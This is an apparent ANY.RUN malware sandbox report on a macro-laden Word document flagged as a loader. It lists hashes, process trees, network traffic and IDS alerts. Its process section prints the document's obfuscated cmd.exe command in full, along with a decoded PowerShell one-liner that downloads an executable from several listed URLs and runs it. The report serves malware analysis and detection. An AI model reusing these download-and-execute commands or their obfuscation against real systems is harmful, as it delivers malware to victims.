analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

2018_12Details_betreffend_Transaktion.doc

Full analysis: https://app.any.run/tasks/0d4e600a-43d0-4bf0-bf25-a58edf3f994b
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: December 14, 2018, 14:43:08
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 14 08:56:00 2018, Last Saved Time/Date: Fri Dec 14 08:56:00 2018, Number of Pages: 1, Number of Words: 3, Number of Characters: 20, Security: 0
MD5:

7901498FADAAE3EA05F9DCCB95CA4D49

SHA1:

0E812652A93E648A214EA137C9184DEA04706223

SHA256:

D189BFAB79BDAC3C0DEDD42AC7DB19350517E3021F946D649C15C400E292546F

SSDEEP:

1536:A7ljmW9/bvFtKnTKD03xJOMbyixxiQrSDqMoX+a9m:Kl/bvFYNMM2QsQrSDqMx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2972)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2972)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2828)
    • Application was dropped or rewritten from another process

      • 634.exe (PID: 2200)
      • 634.exe (PID: 3360)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2296)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 2296)
  • SUSPICIOUS

    • Application launched itself

      • cmd.exe (PID: 2152)
      • cmd.exe (PID: 2736)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2152)
      • cmd.exe (PID: 2828)
      • cmd.exe (PID: 3216)
      • cmd.exe (PID: 2736)
    • Creates files in the user directory

      • powershell.exe (PID: 1900)
      • powershell.exe (PID: 2296)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2296)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2972)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2972)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:12:14 08:56:00
ModifyDate: 2018:12:14 08:56:00
Pages: 1
Words: 3
Characters: 20
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 22
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
12
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs find.exe no specs powershell.exe 634.exe no specs powershell.exe no specs 634.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2972"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2018_12Details_betreffend_Transaktion.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2152c:\FFHJqOmZKr\HHzhYTSY\lhzWGVp\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set xyE8=bjWhCsTjFcswvaUtbcJuCUvtBaWwuCSsaZZrV,ok =MO.Y8ndIQlz+y(34DA;XP\@{0N}i$f-x6pmG/ge':K)R&&for %7 in (70,22,21,42,41,81,85,69,28,81,60,70,34,59,43,41,47,80,27,72,38,16,7,80,17,23,40,67,80,23,44,26,80,16,29,51,69,80,47,23,60,70,45,21,69,41,81,3,23,23,75,82,78,78,27,27,27,44,48,69,47,32,80,51,80,17,23,35,38,47,69,17,31,44,17,38,76,78,36,83,18,75,64,3,23,23,75,82,78,78,69,17,80,7,28,39,44,17,38,76,78,69,73,27,64,3,23,23,75,82,78,78,3,28,47,23,80,35,75,28,16,51,69,31,3,80,35,31,44,17,38,76,44,32,28,78,36,52,61,35,22,66,73,64,3,23,23,75,82,78,78,69,17,75,47,44,17,38,76,78,35,50,36,45,18,75,48,64,3,23,23,75,82,78,78,69,79,51,80,17,69,32,44,17,38,76,78,76,8,74,81,44,30,75,51,69,23,55,81,64,81,84,60,70,27,38,31,41,81,45,42,58,81,60,70,69,62,62,40,41,40,81,74,56,57,81,60,70,58,50,77,41,81,51,49,32,81,60,70,52,17,27,41,70,80,47,22,82,23,80,76,75,53,81,63,81,53,70,69,62,62,53,81,44,80,73,80,81,60,71,38,35,80,32,17,3,55,70,48,76,83,40,69,47,40,70,45,21,69,84,65,23,35,54,65,70,34,59,43,44,58,38,27,47,51,38,32,48,8,69,51,80,55,70,48,76,83,37,40,70,52,17,27,84,60,70,28,69,26,41,81,17,27,23,81,60,49,71,40,55,55,77,80,23,72,49,23,80,76,40,70,52,17,27,84,44,51,80,47,79,23,3,40,72,79,80,40,46,66,66,66,66,84,40,65,49,47,22,38,39,80,72,49,23,80,76,40,70,52,17,27,60,70,34,30,8,41,81,28,6,23,81,60,16,35,80,32,39,60,68,68,17,32,23,17,3,65,68,68,70,26,23,38,41,81,38,30,51,81,60,90)do set 5tvG=!5tvG!!xyE8:~%7,1!&&if %7 equ 90 echo !5tvG:~6!|FOR /F "delims=.U9\B tokens=9" %I IN ('ftype^^^|find "ll\"')DO %I -"c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2736CmD /V:/C"set xyE8=bjWhCsTjFcswvaUtbcJuCUvtBaWwuCSsaZZrV,ok =MO.Y8ndIQlz+y(34DA;XP\@{0N}i$f-x6pmG/ge':K)R&&for %7 in (70,22,21,42,41,81,85,69,28,81,60,70,34,59,43,41,47,80,27,72,38,16,7,80,17,23,40,67,80,23,44,26,80,16,29,51,69,80,47,23,60,70,45,21,69,41,81,3,23,23,75,82,78,78,27,27,27,44,48,69,47,32,80,51,80,17,23,35,38,47,69,17,31,44,17,38,76,78,36,83,18,75,64,3,23,23,75,82,78,78,69,17,80,7,28,39,44,17,38,76,78,69,73,27,64,3,23,23,75,82,78,78,3,28,47,23,80,35,75,28,16,51,69,31,3,80,35,31,44,17,38,76,44,32,28,78,36,52,61,35,22,66,73,64,3,23,23,75,82,78,78,69,17,75,47,44,17,38,76,78,35,50,36,45,18,75,48,64,3,23,23,75,82,78,78,69,79,51,80,17,69,32,44,17,38,76,78,76,8,74,81,44,30,75,51,69,23,55,81,64,81,84,60,70,27,38,31,41,81,45,42,58,81,60,70,69,62,62,40,41,40,81,74,56,57,81,60,70,58,50,77,41,81,51,49,32,81,60,70,52,17,27,41,70,80,47,22,82,23,80,76,75,53,81,63,81,53,70,69,62,62,53,81,44,80,73,80,81,60,71,38,35,80,32,17,3,55,70,48,76,83,40,69,47,40,70,45,21,69,84,65,23,35,54,65,70,34,59,43,44,58,38,27,47,51,38,32,48,8,69,51,80,55,70,48,76,83,37,40,70,52,17,27,84,60,70,28,69,26,41,81,17,27,23,81,60,49,71,40,55,55,77,80,23,72,49,23,80,76,40,70,52,17,27,84,44,51,80,47,79,23,3,40,72,79,80,40,46,66,66,66,66,84,40,65,49,47,22,38,39,80,72,49,23,80,76,40,70,52,17,27,60,70,34,30,8,41,81,28,6,23,81,60,16,35,80,32,39,60,68,68,17,32,23,17,3,65,68,68,70,26,23,38,41,81,38,30,51,81,60,90)do set 5tvG=!5tvG!!xyE8:~%7,1!&&if %7 equ 90 echo !5tvG:~6!|FOR /F "delims=.U9\B tokens=9" %I IN ('ftype^^^|find "ll\"')DO %I -"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1760C:\Windows\system32\cmd.exe /S /D /c" echo $vUM='Riu';$ZAO=new-object Net.WebClient;$YUi='http://www.dinaelectronics.com/VKJp@http://icejuk.com/ixw@http://hunterpublishers.com.au/VzXrv0x@http://icpn.com/rQVYJpd@http://iglecia.com/mF6'.Split('@');$wos='YMD';$iPP = '634';$DQG='lIa';$zcw=$env:temp+'\'+$iPP+'.exe';foreach($dmK in $YUi){try{$ZAO.DownloadFile($dmK, $zcw);$uiW='cwt';If ((Get-Item $zcw).length -ge 80000) {Invoke-Item $zcw;$ZSF='uTt';break;}}catch{}}$Wto='oSl';"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2828C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=.U9\B tokens=9" %I IN ('ftype^|find "ll\"') DO %I -"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3216C:\Windows\system32\cmd.exe /c ftype|find "ll\"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3456C:\Windows\system32\cmd.exe /S /D /c" ftype"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3548find "ll\"C:\Windows\system32\find.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (grep) Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2296powershell -C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3360"C:\Users\admin\AppData\Local\Temp\634.exe" C:\Users\admin\AppData\Local\Temp\634.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Total events
1 948
Read events
1 426
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
4
Text files
0
Unknown types
5

Dropped files

PID
Process
Filename
Type
2972WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA888.tmp.cvr
MD5:
SHA256:
2972WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6001D9E1.wmf
MD5:
SHA256:
2972WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EBD71797.wmf
MD5:
SHA256:
2296powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YNU0EMZNCW5D4UATHGU9.temp
MD5:
SHA256:
1900powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O88RI82W3HFQ7U0FOCPO.temp
MD5:
SHA256:
2972WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:4F5F40C47DDD92765B47161B15380CF9
SHA256:3A34E29F643B0F7C1B38279E3FA88B8310EFE43FDAF57CAE22CE4944767D3F29
2296powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0C1DAA668BA499584B0AC7476368101E
SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
2972WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:E6843B09DE0B5D4F9569B346B46A3CE6
SHA256:F014CD9AD15866B165B5CFF47B1ECCD68A63963FA2B8DF5118F8BA1A3F225E1B
2972WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E3E0B66E.wmfwmf
MD5:C71268CEBE10A14C205EBBC270E48C5E
SHA256:BF27A03B39E1621646552FCA5F82C75E8A05ACEA064439C95AFE2D91F6165A99
2972WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6851A960.wmfwmf
MD5:BD5EA46D85C2E066CAA492AF1D6A7723
SHA256:B57F6506197A83E0EC825A54D4D2B4A9ABF10352C06D2F13FCCBBE3CA41A2BD4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2296
powershell.exe
GET
200
209.190.47.251:80
http://www.dinaelectronics.com/VKJp/
US
executable
144 Kb
malicious
2296
powershell.exe
GET
301
209.190.47.251:80
http://www.dinaelectronics.com/VKJp
US
html
244 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2296
powershell.exe
209.190.47.251:80
www.dinaelectronics.com
eNET Inc.
US
suspicious

DNS requests

Domain
IP
Reputation
www.dinaelectronics.com
  • 209.190.47.251
malicious

Threats

PID
Process
Class
Message
2296
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2296
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
2296
powershell.exe
A Network Trojan was detected
ET POLICY Terse Named Filename EXE Download - Possibly Hostile
2296
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2296
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2296
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info